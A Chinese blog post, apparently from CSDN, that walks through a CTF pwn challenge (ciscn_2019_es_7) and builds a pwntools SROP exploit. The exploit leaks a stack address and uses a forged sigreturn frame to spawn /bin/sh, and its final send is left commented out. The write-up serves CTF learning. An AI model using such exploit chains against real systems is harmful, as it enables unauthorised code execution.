srop--ciscn_2019_es_7

最新推荐文章于 2024-01-30 19:53:40 发布
最新推荐文章于 2024-01-30 19:53:40 发布
阅读量132 收藏
点赞数 1
文章标签: 网络安全 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_61948538/article/details/128791416
版权

复健pwn第二天,又懒了两三天,后面尽量每天更新一题

这个是比较简单的一道srop题

这是总的函数表,函数并不多,同时,也能较为清楚的看出是一道栈题,找不到system和sh所以第一个想的必然是ret2libc,但是又可以发现没有got表可以泄露,write和read都是用syscall来实现的,所以我们想的并不是泄露,而是用syscall来做题,然后再看gadgets函数

即可以确定是srop

开始做题

第一步就是泄露栈地址,从而得到我们输入的"/bin/sh"的地址,然后再走一遍流程,触发rax=0xf时的syscall,得到我们设计的寄存器值,这时rip=syscall的地址,所以接下来又会触发一次syscall,从而实现system("/bin/sh")

from pwn import *
context(log_level = 'debug',arch = 'amd64',os ='linux')
p = process('/home/hacker/Desktop/ciscn_2019_es_7')
elf = ELF('/home/hacker/Desktop/ciscn_2019_es_7' )

gadgets_addr=0x4004d7
syscall_addr = 0x400517
#main_addr = 0x4004f1
main_addr = 0x40051d
payload1 = "/bin/sh\x00"+'a'*(0x10-1-8) + 'b' + p64(main_addr)
#gdb.attach(p)
#pause()
p.send(payload1)

p.recv(0x20)
stack_addr = u64(p.recv(6).ljust(8,'\x00'))
print(hex(stack_addr))
bin_sh_addr = stack_addr - 0x118
print("bin_sh_addr=",hex(bin_sh_addr))

sigframe = SigreturnFrame()
sigframe.rax = 59
sigframe.rdi = bin_sh_addr
sigframe.rsi = 0
sigframe.rdx = 0
sigframe.rip = syscall_addr

gdb.attach(p)
pause()

payload = 'a'*0x10 + p64(gadgets_addr) + p64(syscall_addr) + str(sigframe)
#p.send(payload)
p.send('a')
p.interactive()

在调试的过程中会发现main_addr = 0x4004f1或者gadgets_addr=0x4004d6会出现问题,为什么呢,最后调的时候发现,在第二次ret的时候会出现问题,栈上我们设置的ret的地址会在实际情况下面一点,因为vuln和gadgets函数这两个函数ret之前没有leave,但他们一开始就有push rbp,所以栈会出现错误。

而这个sigframe需要在的位置,就是执行rax=0xf的syscall之后rsp指向的地方。

_On3_
关注
BUUCTF-PWN rctf_2019_babyheap(house of storm,堆SROP
weixin_44145820的博客
06-05 1575
目录题目分析漏洞利用Exp 题目分析 程序还有沙箱保护,把execve禁用了,只能orw了 漏洞利用 Exp
BUUCTF pwn ciscn_2019_s_3(SROP)
菜的只能随便写写博客
02-13 1609
0x01 文件分析   0x02 运行  有一个回显,并且还有多余的字符显示,接着看代码分析一下。   0x03 IDA源码  由后面的函数可以看出,这个程序使用的系统调用,并且vuln里面存在栈溢出。  在程序之中的gadgets存在着两个为rax赋值的gadget,15的系统号是rt_sigreturn,3b的系统调用是execve,利用这两个可以执行系统调用得到shell。  ex...
SROP学习 smallest & ciscn_s_3
红叶的博客
03-19 548
SROP学习,例题 smallest ,ciscn_s_3
[BUUCTF]-PWN:ciscn_2019_es_7解析(系统调用execve,srop
2301_79326813的博客
01-30 391
这道题好像和buu的ciscn_2019_s_3是一模一样的看保护64位,没开canary和pie看ida题目还有能往rax传递0x3B和0xf的函数,这就提示我们可以用系统调用来getshell。
[BUUCTF]ciscn_2019_es_7(SROP)
zyxx_wjc的博客
07-12 375
[BUUCTF]ciscn_2019_es_7
[BUUCTF]PWN——ciscn_2019_es_7[详解]
mcmuyanga的博客
01-12 1627
ciscn_2019_es_7 附件 步骤: 例行检查,64位程序,开启了nx保护 本地试运行一下看看大概的情况 64位ida载入,关键函数很简单,两个系统调用,buf存在溢出 看到系统调用和溢出,想到了SROP,之前遇到过一次,关于原理可以看一下这两篇文章 https://www.freebuf.com/articles/network/87447.html https://ctf-wiki.org/pwn/linux/stackoverflow/advanced-rop/srop/?h=+sr
MSE.zip_MSE-SROP_carrier_carrier mse_matlab mse_ofdm
09-24
标题"MSE.zip_MSE-SROP_carrier_carrier mse_matlab mse_ofdm"涉及到的主要知识点是关于无线通信中的误差性能评估,特别是针对正交频分复用(OFDM)系统。描述提到的是一个基于平均平方误差(Mean Square Error,MSE...
ciscn_2019_es_7
z1r0的博客
12-28 1077
ciscn_2019_es_7 查看保护 有溢出,还有系统调用syscall。srop。 输入0x10,write时可以out出0x30个,动态发现会有一个栈上地址。 栈上地址距离buf地址0x128(在本机动态时是0x128在远程是0x118,本地没有patchelf)有了buf地址也就是/bin/sh的地址。因为buf中输入/bin/sh就行了。接下来就是Sigreturnframe的布局和sigreturn的调用。 from pwn import * context(arch='amd64'
buuctf:ciscn_s_3题解
xia0ji233
05-27 733
title: 系统调用的学习 date: 2021-05-25 22:00:00 tags: binary security study report syscall comments: true categories: ctf pwn today新的知识又增长了,发现了getshell的另一种方式:syscall和srop。故事还要源于…(此处省略万字输出) (note:本作者这次有点懒,没有写AT&T汇编,而是一律用了intel汇编,请悉知) 可能是之前汇编基础不太好吧,竟没有发现sy.
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8539
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
华为云:云服务器ECS实战部署.docx
11-10
华为云:云服务器ECS实战部署.docx
【光学】基于matlab OAM涡旋光束(拉盖尔-高斯光束)【Matlab仿真 7508期】.zip
11-10
【光学】基于matlab OAM涡旋光束(拉盖尔-高斯光束)【Matlab仿真 7508期】.zip
【无线定位】基于matlab改进的TOA求解信号最优的基站定位优化问题【Matlab仿真 8797期】.zip
11-10
CSDN Matlab武动乾坤上传的资料均有对应的代码,代码均可运行,亲测可用,适合小白; 1、代码压缩包内容 主函数:main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开main.m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描博客文章底部QQ名片; 4.1 博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作
Terraform:Terraform与Google Cloud集成实战.docx
11-10
Terraform:Terraform与Google Cloud集成实战.docx
【姿态估计】基于matlab扩展卡尔曼滤波器DEKF和9轴IMU姿态估计【Matlab仿真 8017期】.zip
11-10
CSDN Matlab武动乾坤上传的资料均有对应的代码,代码均可运行,亲测可用,适合小白; 1、代码压缩包内容 主函数:main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开main.m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描博客文章底部QQ名片; 4.1 博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作
全桥Boost-PFC电路及MATLAB仿真
最新发布
11-10
全桥Boost-PFC电路及MATLAB仿真
基于Java+SpringBoot+Vue的高校实验室教学管理系统答辩PPT.pptx
11-10
基于Java+SpringBoot+Vue的高校实验室教学管理系统答辩PPT.pptx
abrt-addon-pstoreoops-2.1.11-57.el7.centos.x86_64.rpm
11-10
Centos7 el7.x86_64 官方离线安装包,安装指令为 sudo rpm -ivh abrt-addon-pstoreoops-2.1.11-57.el7.centos.x86_64.rpm
Visual Basic入门指南:基础理论与实践案例解析
11-10
内容概要:本文详细介绍了Visual Basic(VB)的背景和发展历程,着重讲解了它的基本概念、开发流程以及开发过程中可能出现的问题及相应的解决方法。为了使内容更加具体易懂,还提供了一个简单计算器的创建实例,涵盖界面设计、属性设置、事件编码和程序发布等全过程。最终,强调了学习VB对于初学者的必要性和重要性。 适合人群:对Visual Basic感兴趣的新手程序员,特别是那些希望通过实践加深对语言理解的学习者。 使用场景及目标:适用于初学者逐步建立起Windows应用程序开发的基础知识,学会利用VB强大的集成开发环境构建简单应用,同时培养解决问题的能力和编程思维。 阅读建议:读者应该先从基础知识学起,然后跟着文中给出的具体案例动手操作。遇到问题不要急于求解,尝试自己思考解决方案。此外,注意关注文中提到的各种技巧和最佳实践,以便提升自身技能。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值